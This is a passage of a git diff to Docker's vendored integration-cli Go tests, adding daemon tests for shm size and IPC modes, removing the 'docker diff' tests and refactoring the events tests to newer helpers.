time.NewTicker(50 * time.Millisecond) + timeout := time.After(10 * time.Second) + + for range ticker.C { + select { + case <-timeout: + c.Fatal("timeout waiting for container restart") + default: + } + + out, err := s.d.Cmd("inspect", "-f", "{{json .State}}", id) + c.Assert(err, 
checker.IsNil, check.Commentf("output: %s", out)) + + var newState state + err = json.Unmarshal([]byte(strings.TrimSpace(out)), &newState) + c.Assert(err, checker.IsNil) + + if !newState.Running { + continue + } + if newState.StartedAt.After(origState.StartedAt) { + break + } + } + + out, err = s.d.Cmd("stop", id) + c.Assert(err, check.IsNil, check.Commentf("output: %s", out)) +} + +func (s *DockerDaemonSuite) TestShmSize(c *check.C) { + testRequires(c, DaemonIsLinux) + + size := 67108864 * 2 + pattern := regexp.MustCompile(fmt.Sprintf("shm on /dev/shm type tmpfs(.*)size=%dk", size/1024)) + + s.d.StartWithBusybox(c, "--default-shm-size", fmt.Sprintf("%v", size)) + + name := "shm1" + out, err := s.d.Cmd("run", "--name", name, "busybox", "mount") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(pattern.MatchString(out), checker.True) + out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.ShmSize}}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.TrimSpace(out), check.Equals, fmt.Sprintf("%v", size)) +} + +func (s *DockerDaemonSuite) TestShmSizeReload(c *check.C) { + testRequires(c, DaemonIsLinux) + + configPath, err := ioutil.TempDir("", "test-daemon-shm-size-reload-config") + c.Assert(err, checker.IsNil, check.Commentf("could not create temp file for config reload")) + defer os.RemoveAll(configPath) // clean up + configFile := filepath.Join(configPath, "config.json") + + size := 67108864 * 2 + configData := []byte(fmt.Sprintf(`{"default-shm-size": "%dM"}`, size/1024/1024)) + c.Assert(ioutil.WriteFile(configFile, configData, 0666), checker.IsNil, check.Commentf("could not write temp file for config reload")) + pattern := regexp.MustCompile(fmt.Sprintf("shm on /dev/shm type tmpfs(.*)size=%dk", size/1024)) + + s.d.StartWithBusybox(c, "--config-file", configFile) + + name := "shm1" + out, err := s.d.Cmd("run", "--name", name, "busybox", "mount") + c.Assert(err, check.IsNil, check.Commentf("Output: 
%s", out)) + c.Assert(pattern.MatchString(out), checker.True) + out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.ShmSize}}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.TrimSpace(out), check.Equals, fmt.Sprintf("%v", size)) + + size = 67108864 * 3 + configData = []byte(fmt.Sprintf(`{"default-shm-size": "%dM"}`, size/1024/1024)) + c.Assert(ioutil.WriteFile(configFile, configData, 0666), checker.IsNil, check.Commentf("could not write temp file for config reload")) + pattern = regexp.MustCompile(fmt.Sprintf("shm on /dev/shm type tmpfs(.*)size=%dk", size/1024)) + + err = s.d.ReloadConfig() + c.Assert(err, checker.IsNil, check.Commentf("error reloading daemon config")) + + name = "shm2" + out, err = s.d.Cmd("run", "--name", name, "busybox", "mount") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(pattern.MatchString(out), checker.True) + out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.ShmSize}}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.TrimSpace(out), check.Equals, fmt.Sprintf("%v", size)) +} + +// this is used to test both "private" and "shareable" daemon default ipc modes +func testDaemonIpcPrivateShareable(d *daemon.Daemon, c *check.C, mustExist bool) { + name := "test-ipcmode" + _, err := d.Cmd("run", "-d", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + + // get major:minor pair for /dev/shm from container's /proc/self/mountinfo + cmd := "awk '($5 == \"/dev/shm\") {printf $3}' /proc/self/mountinfo" + mm, err := d.Cmd("exec", "-i", name, "sh", "-c", cmd) + c.Assert(err, checker.IsNil) + c.Assert(mm, checker.Matches, "^[0-9]+:[0-9]+$") + exists, err := testIpcCheckDevExists(mm) + c.Assert(err, checker.IsNil) + c.Logf("[testDaemonIpcPrivateShareable] ipcdev: %v, exists: %v, mustExist: %v\n", mm, exists, mustExist) + c.Assert(exists, checker.Equals, mustExist) +} + +// TestDaemonIpcModeShareable checks that 
--default-ipc-mode shareable works as intended. +func (s *DockerDaemonSuite) TestDaemonIpcModeShareable(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + s.d.StartWithBusybox(c, "--default-ipc-mode", "shareable") + testDaemonIpcPrivateShareable(s.d, c, true) +} + +// TestDaemonIpcModePrivate checks that --default-ipc-mode private works as intended. +func (s *DockerDaemonSuite) TestDaemonIpcModePrivate(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + s.d.StartWithBusybox(c, "--default-ipc-mode", "private") + testDaemonIpcPrivateShareable(s.d, c, false) +} + +// used to check if an IpcMode given in config works as intended +func testDaemonIpcFromConfig(s *DockerDaemonSuite, c *check.C, mode string, mustExist bool) { + f, err := ioutil.TempFile("", "test-daemon-ipc-config") + c.Assert(err, checker.IsNil) + defer os.Remove(f.Name()) + + config := `{"default-ipc-mode": "` + mode + `"}` + _, err = f.WriteString(config) + c.Assert(f.Close(), checker.IsNil) + c.Assert(err, checker.IsNil) + + s.d.StartWithBusybox(c, "--config-file", f.Name()) + testDaemonIpcPrivateShareable(s.d, c, mustExist) +} + +// TestDaemonIpcModePrivateFromConfig checks that "default-ipc-mode: private" config works as intended. +func (s *DockerDaemonSuite) TestDaemonIpcModePrivateFromConfig(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + testDaemonIpcFromConfig(s, c, "private", false) +} + +// TestDaemonIpcModeShareableFromConfig checks that "default-ipc-mode: shareable" config works as intended. 
+func (s *DockerDaemonSuite) TestDaemonIpcModeShareableFromConfig(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + testDaemonIpcFromConfig(s, c, "shareable", true) +} + +func testDaemonStartIpcMode(c *check.C, from, mode string, valid bool) { + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + c.Logf("Checking IpcMode %s set from %s\n", mode, from) + var serr error + switch from { + case "config": + f, err := ioutil.TempFile("", "test-daemon-ipc-config") + c.Assert(err, checker.IsNil) + defer os.Remove(f.Name()) + config := `{"default-ipc-mode": "` + mode + `"}` + _, err = f.WriteString(config) + c.Assert(f.Close(), checker.IsNil) + c.Assert(err, checker.IsNil) + + serr = d.StartWithError("--config-file", f.Name()) + case "cli": + serr = d.StartWithError("--default-ipc-mode", mode) + default: + c.Fatalf("testDaemonStartIpcMode: invalid 'from' argument") + } + if serr == nil { + d.Stop(c) + } + + if valid { + c.Assert(serr, check.IsNil) + } else { + c.Assert(serr, check.NotNil) + icmd.RunCommand("grep", "-E", "IPC .* is (invalid|not supported)", d.LogFileName()).Assert(c, icmd.Success) + } +} + +// TestDaemonStartWithIpcModes checks that daemon starts fine given correct +// arguments for default IPC mode, and bails out with incorrect ones. +// Both CLI option (--default-ipc-mode) and config parameter are tested. 
+func (s *DockerDaemonSuite) TestDaemonStartWithIpcModes(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + ipcModes := []struct { + mode string + valid bool + }{ + {"private", true}, + {"shareable", true}, + + {"host", false}, + {"container:123", false}, + {"nosuchmode", false}, + } + + for _, from := range []string{"config", "cli"} { + for _, m := range ipcModes { + testDaemonStartIpcMode(c, from, m.mode, m.valid) + } + } +} + +// TestDaemonRestartIpcMode makes sure a container keeps its ipc mode +// (derived from daemon default) even after the daemon is restarted +// with a different default ipc mode. +func (s *DockerDaemonSuite) TestDaemonRestartIpcMode(c *check.C) { + f, err := ioutil.TempFile("", "test-daemon-ipc-config-restart") + c.Assert(err, checker.IsNil) + file := f.Name() + defer os.Remove(file) + c.Assert(f.Close(), checker.IsNil) + + config := []byte(`{"default-ipc-mode": "private"}`) + c.Assert(ioutil.WriteFile(file, config, 0644), checker.IsNil) + s.d.StartWithBusybox(c, "--config-file", file) + + // check the container is created with private ipc mode as per daemon default + name := "ipc1" + _, err = s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top") + c.Assert(err, checker.IsNil) + m, err := s.d.InspectField(name, ".HostConfig.IpcMode") + c.Assert(err, check.IsNil) + c.Assert(m, checker.Equals, "private") + + // restart the daemon with shareable default ipc mode + config = []byte(`{"default-ipc-mode": "shareable"}`) + c.Assert(ioutil.WriteFile(file, config, 0644), checker.IsNil) + s.d.Restart(c, "--config-file", file) + + // check the container is still having private ipc mode + m, err = s.d.InspectField(name, ".HostConfig.IpcMode") + c.Assert(err, check.IsNil) + c.Assert(m, checker.Equals, "private") + + // check a new container is created with shareable ipc mode as per new daemon default + name = "ipc2" + _, err = s.d.Cmd("run", "-d", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + m, 
err = s.d.InspectField(name, ".HostConfig.IpcMode") + c.Assert(err, check.IsNil) + c.Assert(m, checker.Equals, "shareable") +} + +// TestFailedPluginRemove makes sure that a failed plugin remove does not block +// the daemon from starting +func (s *DockerDaemonSuite) TestFailedPluginRemove(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, SameHostDaemon) + d := daemon.New(c, dockerBinary, dockerdBinary) + d.Start(c) + cli, err := client.NewClient(d.Sock(), api.DefaultVersion, nil, nil) + c.Assert(err, checker.IsNil) + + ctx, cancel := context.WithTimeout(context.Background(), 300*time.Second) + defer cancel() + + name := "test-plugin-rm-fail" + out, err := cli.PluginInstall(ctx, name, types.PluginInstallOptions{ + Disabled: true, + AcceptAllPermissions: true, + RemoteRef: "cpuguy83/docker-logdriver-test", + }) + c.Assert(err, checker.IsNil) + defer out.Close() + io.Copy(ioutil.Discard, out) + + ctx, cancel = context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + p, _, err := cli.PluginInspectWithRaw(ctx, name) + c.Assert(err, checker.IsNil) + + // simulate a bad/partial removal by removing the plugin config. 
+ configPath := filepath.Join(d.Root, "plugins", p.ID, "config.json") + c.Assert(os.Remove(configPath), checker.IsNil) + + d.Restart(c) + ctx, cancel = context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + _, err = cli.Ping(ctx) + c.Assert(err, checker.IsNil) + + _, _, err = cli.PluginInspectWithRaw(ctx, name) + // plugin should be gone since the config.json is gone + c.Assert(err, checker.NotNil) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go deleted file mode 100644 index 08cf6e1caa..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go +++ /dev/null @@ -1,98 +0,0 @@ -package main - -import ( - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// ensure that an added file shows up in docker diff -func (s *DockerSuite) TestDiffFilenameShownInOutput(c *check.C) { - containerCmd := `mkdir /foo; echo xyzzy > /foo/bar` - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd) - - // Wait for it to exit as cannot diff a running container on Windows, and - // it will take a few seconds to exit. Also there's no way in Windows to - // differentiate between an Add or a Modify, and all files are under - // a "Files/" prefix. 
- containerID := strings.TrimSpace(out) - lookingFor := "A /foo/bar" - if daemonPlatform == "windows" { - err := waitExited(containerID, 60*time.Second) - c.Assert(err, check.IsNil) - lookingFor = "C Files/foo/bar" - } - - cleanCID := strings.TrimSpace(out) - out, _ = dockerCmd(c, "diff", cleanCID) - - found := false - for _, line := range strings.Split(out, "\n") { - if strings.Contains(line, lookingFor) { - found = true - break - } - } - c.Assert(found, checker.True) -} - -// test to ensure GH #3840 doesn't occur any more -func (s *DockerSuite) TestDiffEnsureInitLayerFilesAreIgnored(c *check.C) { - testRequires(c, DaemonIsLinux) - // this is a list of files which shouldn't show up in `docker diff` - initLayerFiles := []string{"/etc/resolv.conf", "/etc/hostname", "/etc/hosts", "/.dockerenv"} - containerCount := 5 - - // we might not run into this problem from the first run, so start a few containers - for i := 0; i < containerCount; i++ { - containerCmd := `echo foo > /root/bar` - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd) - - cleanCID := strings.TrimSpace(out) - out, _ = dockerCmd(c, "diff", cleanCID) - - for _, filename := range initLayerFiles { - c.Assert(out, checker.Not(checker.Contains), filename) - } - } -} - -func (s *DockerSuite) TestDiffEnsureDefaultDevs(c *check.C) { - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "0") - - cleanCID := strings.TrimSpace(out) - out, _ = dockerCmd(c, "diff", cleanCID) - - expected := map[string]bool{ - "C /dev": true, - "A /dev/full": true, // busybox - "C /dev/ptmx": true, // libcontainer - "A /dev/mqueue": true, - "A /dev/kmsg": true, - "A /dev/fd": true, - "A /dev/ptmx": true, - "A /dev/null": true, - "A /dev/random": true, - "A /dev/stdout": true, - "A /dev/stderr": true, - "A /dev/tty1": true, - "A /dev/stdin": true, - "A /dev/tty": true, - "A /dev/urandom": true, - "A /dev/zero": true, - } - - for _, line := range strings.Split(out, "\n") { - 
c.Assert(line == "" || expected[line], checker.True, check.Commentf(line)) - } -} - -// https://github.com/docker/docker/pull/14381#discussion_r33859347 -func (s *DockerSuite) TestDiffEmptyArgClientError(c *check.C) { - out, _, err := dockerCmdWithError("diff", "") - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Contains, "Container name cannot be empty") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go index 1fbfc742de..db1e34020f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go @@ -2,21 +2,25 @@ package main import ( "bufio" + "context" "encoding/json" "fmt" "io" "io/ioutil" - "net/http" "os" "os/exec" "strings" "time" + "github.com/docker/docker/api/types" eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/client" eventstestutils "github.com/docker/docker/daemon/events/testutils" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestEventsTimestampFormats(c *check.C) { @@ -32,7 +36,7 @@ func (s *DockerSuite) TestEventsTimestampFormats(c *check.C) { // List of available time formats to --since unixTs := func(t time.Time) string { return fmt.Sprintf("%v", t.Unix()) } rfc3339 := func(t time.Time) string { return t.Format(time.RFC3339) } - duration := func(t time.Time) string { return time.Now().Sub(t).String() } + duration := func(t time.Time) string { return time.Since(t).String() } // --since=$start must contain only the 'untag' event for _, f := range []func(time.Time) string{unixTs, 
rfc3339, duration} { @@ -65,7 +69,7 @@ func (s *DockerSuite) TestEventsUntag(c *check.C) { Command: []string{dockerBinary, "events", "--since=1"}, Timeout: time.Millisecond * 2500, }) - c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + result.Assert(c, icmd.Expected{Timeout: true}) events := strings.Split(result.Stdout(), "\n") nEvents := len(events) @@ -77,42 +81,6 @@ func (s *DockerSuite) TestEventsUntag(c *check.C) { } } -func (s *DockerSuite) TestEventsLimit(c *check.C) { - // Limit to 8 goroutines creating containers in order to prevent timeouts - // creating so many containers simultaneously on Windows - sem := make(chan bool, 8) - numContainers := 17 - errChan := make(chan error, numContainers) - - args := []string{"run", "--rm", "busybox", "true"} - for i := 0; i < numContainers; i++ { - sem <- true - go func() { - defer func() { <-sem }() - out, err := exec.Command(dockerBinary, args...).CombinedOutput() - if err != nil { - err = fmt.Errorf("%v: %s", err, string(out)) - } - errChan <- err - }() - } - - // Wait for all goroutines to finish - for i := 0; i < cap(sem); i++ { - sem <- true - } - close(errChan) - - for err := range errChan { - c.Assert(err, checker.IsNil, check.Commentf("%q failed with error", strings.Join(args, " "))) - } - - out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) - events := strings.Split(out, "\n") - nEvents := len(events) - 1 - c.Assert(nEvents, checker.Equals, 64, check.Commentf("events should be limited to 64, but received %d", nEvents)) -} - func (s *DockerSuite) TestEventsContainerEvents(c *check.C) { dockerCmd(c, "run", "--rm", "--name", "container-events-test", "busybox", "true") @@ -221,7 +189,7 @@ func (s *DockerSuite) TestEventsImageImport(c *check.C) { cleanedContainerID := strings.TrimSpace(out) since := daemonUnixTime(c) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "export", cleanedContainerID), 
exec.Command(dockerBinary, "import", "-"), ) @@ -254,7 +222,7 @@ func (s *DockerSuite) TestEventsImageLoad(c *check.C) { dockerCmd(c, "load", "-i", "saveimg.tar") result := icmd.RunCommand("rm", "-rf", "saveimg.tar") - c.Assert(result, icmd.Matches, icmd.Success) + result.Assert(c, icmd.Success) out, _ = dockerCmd(c, "images", "-q", "--no-trunc", myImageName) imageID := strings.TrimSpace(out) @@ -377,11 +345,9 @@ func (s *DockerSuite) TestEventsFilterImageLabels(c *check.C) { label := "io.docker.testing=image" // Build a test image. - _, err := buildImage(name, fmt.Sprintf(` + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(` FROM busybox:latest - LABEL %s`, label), true) - c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) - + LABEL %s`, label))) dockerCmd(c, "tag", name, "labelfiltertest:tag1") dockerCmd(c, "tag", name, "labelfiltertest:tag2") dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3") @@ -445,25 +411,25 @@ func (s *DockerSuite) TestEventsCommit(c *check.C) { // Problematic on Windows as cannot commit a running container testRequires(c, DaemonIsLinux) - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) cID := strings.TrimSpace(out) - c.Assert(waitRun(cID), checker.IsNil) + cli.WaitRun(c, cID) - dockerCmd(c, "commit", "-m", "test", cID) - dockerCmd(c, "stop", cID) - c.Assert(waitExited(cID, 5*time.Second), checker.IsNil) + cli.DockerCmd(c, "commit", "-m", "test", cID) + cli.DockerCmd(c, "stop", cID) + cli.WaitExited(c, cID, 5*time.Second) until := daemonUnixTime(c) - out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + out = cli.DockerCmd(c, "events", "-f", "container="+cID, "--until="+until).Combined() c.Assert(out, checker.Contains, "commit", check.Commentf("Missing 'commit' log event")) } func (s *DockerSuite) TestEventsCopy(c *check.C) { // Build a test image. 
- id, err := buildImage("cpimg", ` + buildImageSuccessfully(c, "cpimg", build.WithDockerfile(` FROM busybox - RUN echo HI > /file`, true) - c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) + RUN echo HI > /file`)) + id := getIDByName(c, "cpimg") // Create an empty test file. tempFile, err := ioutil.TempFile("", "test-events-copy-") @@ -488,13 +454,19 @@ func (s *DockerSuite) TestEventsCopy(c *check.C) { } func (s *DockerSuite) TestEventsResize(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cID := strings.TrimSpace(out) c.Assert(waitRun(cID), checker.IsNil) - endpoint := "/containers/" + cID + "/resize?h=80&w=24" - status, _, err := sockRequest("POST", endpoint, nil) - c.Assert(status, checker.Equals, http.StatusOK) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + options := types.ResizeOptions{ + Height: 80, + Width: 24, + } + err = cli.ContainerResize(context.Background(), cID, options) c.Assert(err, checker.IsNil) dockerCmd(c, "stop", cID) @@ -508,9 +480,9 @@ func (s *DockerSuite) TestEventsAttach(c *check.C) { // TODO Windows CI: Figure out why this test fails intermittently (TP5). 
testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-di", "busybox", "cat") + out := cli.DockerCmd(c, "run", "-di", "busybox", "cat").Combined() cID := strings.TrimSpace(out) - c.Assert(waitRun(cID), checker.IsNil) + cli.WaitRun(c, cID) cmd := exec.Command(dockerBinary, "attach", cID) stdin, err := cmd.StdinPipe() @@ -520,7 +492,10 @@ func (s *DockerSuite) TestEventsAttach(c *check.C) { c.Assert(err, checker.IsNil) defer stdout.Close() c.Assert(cmd.Start(), checker.IsNil) - defer cmd.Process.Kill() + defer func() { + cmd.Process.Kill() + cmd.Wait() + }() // Make sure we're done attaching by writing/reading some stuff _, err = stdin.Write([]byte("hello\n")) @@ -531,11 +506,11 @@ func (s *DockerSuite) TestEventsAttach(c *check.C) { c.Assert(stdin.Close(), checker.IsNil) - dockerCmd(c, "kill", cID) - c.Assert(waitExited(cID, 5*time.Second), checker.IsNil) + cli.DockerCmd(c, "kill", cID) + cli.WaitExited(c, cID, 5*time.Second) until := daemonUnixTime(c) - out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + out = cli.DockerCmd(c, "events", "-f", "container="+cID, "--until="+until).Combined() c.Assert(out, checker.Contains, "attach", check.Commentf("Missing 'attach' log event")) } @@ -554,7 +529,7 @@ func (s *DockerSuite) TestEventsTop(c *check.C) { // Problematic on Windows as Windows does not support top testRequires(c, DaemonIsLinux) - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cID := strings.TrimSpace(out) c.Assert(waitRun(cID), checker.IsNil) @@ -588,16 +563,16 @@ func (s *DockerRegistrySuite) TestEventsImageFilterPush(c *check.C) { } func (s *DockerSuite) TestEventsFilterType(c *check.C) { + // FIXME(vdemeester) fails on e2e run + testRequires(c, SameHostDaemon) since := daemonUnixTime(c) name := "labelfiltertest" label := "io.docker.testing=image" // Build a test image. 
- _, err := buildImage(name, fmt.Sprintf(` + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(` FROM busybox:latest - LABEL %s`, label), true) - c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) - + LABEL %s`, label))) dockerCmd(c, "tag", name, "labelfiltertest:tag1") dockerCmd(c, "tag", name, "labelfiltertest:tag2") dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3") @@ -628,7 +603,7 @@ func (s *DockerSuite) TestEventsFilterType(c *check.C) { events = strings.Split(strings.TrimSpace(out), "\n") // Events generated by the container that builds the image - c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events)) + c.Assert(events, checker.HasLen, 2, check.Commentf("Events == %s", events)) out, _ = dockerCmd( c, @@ -686,7 +661,7 @@ func (s *DockerSuite) TestEventsContainerRestart(c *check.C) { // wait until test2 is auto removed. waitTime := 10 * time.Second - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Windows takes longer... 
waitTime = 90 * time.Second } @@ -776,7 +751,7 @@ func (s *DockerSuite) TestEventsFormat(c *check.C) { func (s *DockerSuite) TestEventsFormatBadFunc(c *check.C) { // make sure it fails immediately, without receiving any event result := dockerCmdWithResult("events", "--format", "{{badFuncString .}}") - c.Assert(result, icmd.Matches, icmd.Expected{ + result.Assert(c, icmd.Expected{ Error: "exit status 64", ExitCode: 64, Err: "Error parsing format: template: :1: function \"badFuncString\" not defined", @@ -786,7 +761,7 @@ func (s *DockerSuite) TestEventsFormatBadFunc(c *check.C) { func (s *DockerSuite) TestEventsFormatBadField(c *check.C) { // make sure it fails immediately, without receiving any event result := dockerCmdWithResult("events", "--format", "{{.badFieldString}}") - c.Assert(result, icmd.Matches, icmd.Expected{ + result.Assert(c, icmd.Expected{ Error: "exit status 64", ExitCode: 64, Err: "Error parsing format: template: :1:2: executing \"\" at <.badFieldString>: can't evaluate field badFieldString in type *events.Message", diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go index dc91667116..343b900342 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go @@ -10,13 +10,14 @@ import ( "os" "os/exec" "strings" - "syscall" "time" "unicode" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" "github.com/kr/pty" + "golang.org/x/sys/unix" ) // #5979 @@ -48,7 +49,7 @@ func (s *DockerSuite) TestEventsRedirectStdout(c *check.C) { } func (s *DockerSuite) TestEventsOOMDisableFalse(c *check.C) { - testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, swapMemorySupport) + 
testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, swapMemorySupport, NotPpc64le) errChan := make(chan error) go func() { @@ -78,7 +79,7 @@ func (s *DockerSuite) TestEventsOOMDisableFalse(c *check.C) { } func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) { - testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, NotArm, swapMemorySupport) + testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, NotArm, swapMemorySupport, NotPpc64le) errChan := make(chan error) observer, err := newEventObserver(c) @@ -96,7 +97,7 @@ func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) { }() c.Assert(waitRun("oomTrue"), checker.IsNil) - defer dockerCmd(c, "kill", "oomTrue") + defer dockerCmdWithResult("kill", "oomTrue") containerID := inspectField(c, "oomTrue", "Id") testActions := map[string]chan bool{ @@ -111,7 +112,7 @@ func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) { case <-time.After(20 * time.Second): observer.CheckEventError(c, containerID, "oom", matcher) case <-testActions["oom"]: - // ignore, done + // ignore, done case errRun := <-errChan: if errRun != nil { c.Fatalf("%v", errRun) @@ -184,11 +185,12 @@ func (s *DockerSuite) TestVolumeEvents(c *check.C) { c.Assert(len(events), checker.GreaterThan, 4) volumeEvents := eventActionsByIDAndType(c, events, "test-event-volume-local", "volume") - c.Assert(volumeEvents, checker.HasLen, 4) + c.Assert(volumeEvents, checker.HasLen, 5) c.Assert(volumeEvents[0], checker.Equals, "create") - c.Assert(volumeEvents[1], checker.Equals, "mount") - c.Assert(volumeEvents[2], checker.Equals, "unmount") - c.Assert(volumeEvents[3], checker.Equals, "destroy") + c.Assert(volumeEvents[1], checker.Equals, "create") + c.Assert(volumeEvents[2], checker.Equals, "mount") + c.Assert(volumeEvents[3], checker.Equals, "unmount") + c.Assert(volumeEvents[4], checker.Equals, "destroy") } func (s *DockerSuite) TestNetworkEvents(c *check.C) { @@ -310,11 +312,9 @@ func (s *DockerSuite) TestEventsImageUntagDelete(c 
*check.C) { defer observer.Stop() name := "testimageevents" - imageID, err := buildImage(name, - `FROM scratch - MAINTAINER "docker"`, - true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch + MAINTAINER "docker"`)) + imageID := getIDByName(c, name) c.Assert(deleteImages(name), checker.IsNil) testActions := map[string]chan bool{ @@ -400,7 +400,7 @@ func (s *DockerDaemonSuite) TestDaemonEvents(c *check.C) { daemonConfig := `{"labels":["foo=bar"]}` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) // Get daemon ID out, err := s.d.Cmd("info") @@ -422,14 +422,39 @@ func (s *DockerDaemonSuite) TestDaemonEvents(c *check.C) { fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) time.Sleep(3 * time.Second) out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c)) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s (cluster-advertise=, cluster-store=, cluster-store-opts={}, debug=true, default-runtime=runc, insecure-registries=[], labels=[\"bar=foo\"], live-restore=false, max-concurrent-downloads=1, max-concurrent-uploads=5, name=%s, runtimes=runc:{docker-runc []}, shutdown-timeout=10)", daemonID, daemonName)) + // only check for values known (daemon ID/name) or explicitly set above, + // otherwise just check for names being present. 
+ expectedSubstrings := []string{ + " daemon reload " + daemonID + " ", + "(allow-nondistributable-artifacts=[", + " cluster-advertise=, ", + " cluster-store=, ", + " cluster-store-opts=", + " debug=true, ", + " default-ipc-mode=", + " default-runtime=", + " default-shm-size=", + " insecure-registries=[", + " labels=[\"bar=foo\"], ", + " live-restore=", + " max-concurrent-downloads=1, ", + " max-concurrent-uploads=5, ", + " name=" + daemonName, + " registry-mirrors=[", + " runtimes=", + " shutdown-timeout=10)", + } + + for _, s := range expectedSubstrings { + c.Assert(out, checker.Contains, s) + } } func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) { @@ -444,7 +469,7 @@ func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) { daemonConfig := `{"labels":["foo=bar"]}` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) // Get daemon ID out, err := s.d.Cmd("info") @@ -460,7 +485,7 @@ func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) { } c.Assert(daemonID, checker.Not(checker.Equals), "") - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) time.Sleep(3 * time.Second) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go index cac76d96ae..e97fb85140 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go +++ 